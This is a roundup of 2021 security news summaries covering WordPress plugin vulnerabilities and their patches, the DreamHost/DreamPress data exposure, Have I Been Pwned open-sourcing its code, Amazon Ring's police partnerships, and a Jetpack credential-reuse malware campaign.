Security Vulnerability Discovered in FileBird Plugin; Update Available

On June 9, 2021, a 10up Engineer conducted a routine code review of the FileBird plugin on behalf of a client. The code review followed 10up’s Engineering Best Practices and focused on areas that did not pass our initial automated scans. It uncovered that the code was vulnerable to a Blind SQL Injection attack — a clever type of exploit that involves sending “yes or no” questions to MySQL to extract information from the database when it cannot be output directly to the browser.

That same day, our team responsibly disclosed the vulnerability. We reached out to the team at WPScan, who we’ve previously collaborated with on our WP-CLI Vulnerability Scanner and WordPress Composer Scanner, to report the vulnerability and collaborate on disclosure.

The FileBird plugin authors responded quickly and responsibly, and issued a patch within 36 hours.

This is a critical vulnerability that only impacts version 4.7.3 of the FileBird plugin. It does not impact any previous versions and has been patched in version 4.7.4. All users of FileBird version 4.7.3 are advised to upgrade immediately.

Source and more details: https://10up.com/blog/2021/security-vulnerability-filebird-wordpress-plugin/

‘Have I Been Pwned’ Code Base Now Open Source

Founder Troy Hunt also announces the platform will receive compromised passwords the FBI finds in its investigations.

Have I Been Pwned (HIBP), the free website used by millions to check whether their credentials have been compromised, has open sourced its code base, founder Troy Hunt announced today.

Hunt first mentioned plans to open source the HIBP code base last summer. Now, as requests for the website’s Pwned Passwords approach 1 billion per month, he has confirmed it is officially open source via the .NET Foundation, an independent 501(c) nonprofit organization.

Hunt also announced today that HIBP will receive compromised passwords discovered as part of FBI investigations. The website will provide officials with a way to feed the passwords into HIBP and surface them via the Pwned Passwords tool, he explained.

Source: https://beta.darkreading.com/threat-intelligence/-have-i-been-pwned-code-base-now-open-source

One of the Biggest Website Hosting Providers, DreamHost, Leaked 814 Million Records Online Including Customer Data

A database owned by DreamHost, DreamPress managed WordPress hosting, was publically accessible online.  

3 Years of DreamPress Customer and User Data Exposed Online

On April 16th, 2021 security researcher Jeremiah Fowler together with the Website Planet research team discovered a non-password protected database that contained just under one billion records. The exposed records revealed usernames, display names, and emails for WordPress accounts. The monitoring and file logs exposed many internal records that should not have been publicly accessible. They were structured as roles, ID, display name, email, and other account related information.

Upon further research there were multiple references to DreamHost. The well known hosting provider to over 1.5 million websites also offers a simple solution to install the popular blog platform WordPress called DreamPress. According to their website: DreamPress is DreamHost’s managed WordPress hosting. It’s a scalable service that allows users to manage their WordPress sites.

Among the data exposed:

  • Total Size: 86.15 GB / Total Records: 814,709,344
  • The records exposed: Admin and user information for what appears to be DreamPress accounts for WordPress installations. These include WordPress login location URL, first and last names, email addresses, usernames, roles (admin, editor, registered user, etc).
  • Email addresses of internal and external users that could be targeted in phishing attacks or other social engineering scams.
  • The database was at risk of a ransomware attack due to the configuration settings that allowed public access.
  • Were also exposed: Host IP addresses and timestamps, build and version information that could allow for a secondary path for malware. Plugin and theme details including configuration or security information that could potentially allow cyber criminals to exploit or gain access deeper into the network.

Source: https://www.websiteplanet.com/blog/dreampress-leak-report/

Amazon’s Ring is the largest civilian surveillance network the US has ever seen

Ring is effectively building the largest corporate-owned, civilian-installed surveillance network that the US has ever seen. An estimated 400,000 Ring devices were sold in December 2019 alone, and that was before the across-the-board boom in online retail sales during the pandemic. Amazon is cagey about how many Ring cameras are active at any one point in time, but estimates drawn from Amazon’s sales data place yearly sales in the hundreds of millions. The always-on video surveillance network extends even further when you consider the millions of users on Ring’s affiliated crime reporting app, Neighbors, which allows people to upload content from Ring and non-Ring devices.

Then there’s this: since Amazon bought Ring in 2018, it has brokered more than 1,800 partnerships with local law enforcement agencies, who can request recorded video content from Ring users without a warrant. That is, in as little as three years, Ring connected around one in 10 police departments across the US with the ability to access recorded content from millions of privately owned home security cameras. These partnerships are growing at an alarming rate.

Because Ring cameras are owned by civilians, law enforcement are given a backdoor entry into private video recordings of people in residential and public space that would otherwise be protected under the fourth amendment. By partnering with Amazon, law enforcement circumvents these constitutional and statutory protections, as noted by the attorney Yesenia Flores. In doing so, Ring blurs the line between police work and civilian surveillance and turns your neighbor’s home security system into an informant. Except, unlike an informant, it’s always watching.

Full article: https://www.theguardian.com/commentisfree/2021/may/18/amazon-ring-largest-civilian-surveillance-network-us

Easily Exploitable Critical Vulnerabilities Patched in ProfilePress Plugin

The Wordfence Threat Intelligence team initiated the responsible disclosure process for several vulnerabilities that were discovered in ProfilePress, formerly WP User Avatar, a WordPress plugin installed on over 400,000 sites. These flaws made it possible for an attacker to upload arbitrary files to a vulnerable site and register as an administrator on sites even if user registration was disabled, all without requiring any prior authentication.

A patch was quickly released on May 30, 2021 as version 3.1.4.

Source: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin

Cross-Site Request Forgery Patched in WP Fluent Forms

Wordfence Threat Intelligence team responsibly disclosed a Cross-Site Request Forgery(CSRF) vulnerability in WP Fluent Forms, a WordPress plugin installed on over 80,000 sites. This vulnerability also allowed a stored Cross-Site Scripting(XSS) attack which, if successfully exploited, could be used to take over a site.

A patched version of the plugin, 3.6.67, was released on March 5, 2021

Source: https://www.wordfence.com/blog/2021/06/cross-site-request-forgery-patched-in-wp-fluent-forms

High Severity Vulnerability Patched in WooCommerce Stock Manager Plugin

The Wordfence Threat Intelligence team discovered and reported a vulnerability in WooCommerce Stock Manager, a WordPress plugin installed on over 30,000 sites. This flaw made it possible for an attacker to upload arbitrary files to a vulnerable site and achieve remote code execution, as long as they could trick a site’s administrator into performing an action like clicking on a link.

A patch was quickly released on May 28, 2021 in version 2.6.0.

Source: https://www.wordfence.com/blog/2021/06/high-severity-vulnerability-patched-in-woocommerce-stock-manager-plugin

Malicious Attack Campaign Targeting Jetpack Users Reusing Passwords

The Wordfence Threat Intelligence and Site Cleaning teams have been tracking a malware campaign that redirects all site visitors to malvertising domains, while attempting to keep site administrators unaware of the infection. Since June 1, 2021, the number of sites we are tracking that have been infected with this malware has more than doubled, and we expect this campaign to continue gaining momentum as it relies on a mechanism that is difficult to block directly.

Jetpack is one of the most popular plugins in the WordPress repository, and it has a dizzying array of features that require users to connect their sites to a WordPress.com account. One of these features allows users that are logged in to WordPress.com to perform administrative tasks, including plugin installation, on sites that are connected to WordPress.com via Jetpack.

Unfortunately this means that if the credentials for a WordPress.com account are compromised, an attacker can login to that WordPress.com account and install arbitrary plugins on the connected WordPress site no matter where it is hosted. This includes the malicious plugin used in this campaign. We’ve written about this intrusion vector in the past, and it is regaining popularity due to a number of recent data breaches from other services.

To clarify, no data breach has occurred at WordPress.com itself. However, password reuse is incredibly common, and credentials obtained from recent data breaches are likely to grant access to a number of WordPress.com user accounts. Additionally, although it is possible to configure Jetpack to allow direct login to a site via WordPress.com credentials, this setting does not need to be enabled in order for a site to be vulnerable. All that is required is that a site be connected to a WordPress.com account that has compromised credentials.

What should I do?

If you use Jetpack, you should turn on 2-Factor authentication at WordPress.com. While we strongly recommend using a mobile app or security key for this, even SMS-based 2-Factor authentication is significantly more secure than relying on passwords alone.

If you use the same password for your WordPress.com account that you’ve used for any other service, change your WordPress.com password immediately.

Source: https://www.wordfence.com/blog/2021/06/malicious-attack-campaign-targeting-jetpack-users-reusing-passwords

Critical 0-day in Fancy Product Designer Under Active Attack

A patched version of Fancy Product Designer, 4.6.9, is now available as of June 2, 2021. This article has been updated to reflect newly available information, including Indicators of Compromise.

On May 31, 2021, the Wordfence Threat Intelligence team discovered a critical file upload vulnerability being actively exploited in Fancy Product Designer, a WordPress plugin installed on over 17,000 sites.

We initiated contact with the plugin’s developer the same day and received a response within 24 hours. We sent over the full disclosure the same day we received a response, on June 1, 2021. Due to this vulnerability being actively attacked, we are publicly disclosing with minimal details until users have time to update to the patched version in order to alert the community to take precautions to keep their sites protected.

While the Wordfence Firewall’s built-in file upload protection sufficiently blocks the majority of attacks against this vulnerability, we determined that a bypass was possible in some configurations. As such, we released a new firewall rule to our premium customers on May 31, 2021. Sites still running the free version of Wordfence will receive the rule after 30 days, on June 30, 2021.

As this is a Critical 0-day under active attack and is exploitable in some configurations even if the plugin has been deactivated, we urge anyone using this plugin to update to the latest version available, 4.6.9, immediately.

Source: https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack

Severe Vulnerabilities Patched in Simple 301 Redirects by BetterLinks Plugin

The Wordfence Threat Intelligence team reported several vulnerabilities they had discovered in Simple 301 Redirects by BetterLinks, a WordPress plugin installed on over 300,000 sites. One of these flaws made it possible for unauthenticated users to update redirects for the site allowing an attacker to redirect all site traffic to an external malicious site. In addition, there were several remaining flaws that made it possible for authenticated users to perform actions like installing and activating plugins, in addition to less critical actions.

An initial patch was released on April 15, 2021, and a fully patched version of the plugin was released on May 5, 2021 as version 2.0.4.

Source: https://www.wordfence.com/blog/2021/05/severe-vulnerabilities-patched-in-simple-301-redirects-by-betterlinks-plugin/